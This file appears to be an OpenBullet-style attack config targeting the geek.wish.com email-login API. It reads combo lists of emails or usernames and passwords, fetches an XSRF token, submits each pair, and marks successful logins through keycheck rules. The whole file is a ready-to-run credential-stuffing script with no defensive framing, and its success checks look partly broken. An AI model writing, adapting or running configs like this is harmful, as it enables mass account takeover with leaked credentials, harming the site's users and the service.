[SETTINGS]
{
  "Name": "Geek.Wish",
  "SuggestedBots": 4,
  "LastModified": "2018-09-18T19:30:11.2779038+00:00",
  "AdditionalInfo": "",
  "Author": "suffocate",
  "Version": "1.0.0",
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "UserPass",
  "DataRules": [
    {
      "SliceName": "PASS",
      "RuleType": 2,
      "RuleString": "7",
      "Id": 47752391
    }
  ],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}
[SCRIPT]
FUNCTION ClearCookies "" -> VAR "" 
REQUEST GET "https://geek.wish.com/api/email-login" AutoRedirect=TRUE 
  CONTENT "email=<USER>&password=<PASS>&on_product_page=false&url=https%3A%2F%2Fgeek.wish.com%2F&_buckets=&_experiments=" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0" 
  HEADER "Pragma: no-cache" 
  HEADER "Referer: https://geek.wish.com/" 
PARSE "<COOKIES(_xsrf)>" LR "\"X-XSRFToken\"" "\":\"" Recursive=FALSE -> VAR "X-XSRFToken" "" "" 
REQUEST POST "https://geek.wish.com/api/email-login" AutoRedirect=TRUE 
  CONTENT "email=<USER>&password=<PASS>&on_product_page=false&url=https%3A%2F%2Fgeek.wish.com%2F&_buckets=&_experiments=" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0" 
  HEADER "Pragma: no-cache" 
  HEADER "Referer: https://geek.wish.com/" 
KEYCHECK BanOn4XX=FALSE BanOnToCheck=TRUE 
  KEYCHAIN Success OR 
  KEYCHAIN Success OR 
    KEY "" 
  KEYCHAIN Success OR 
    KEY "false" 
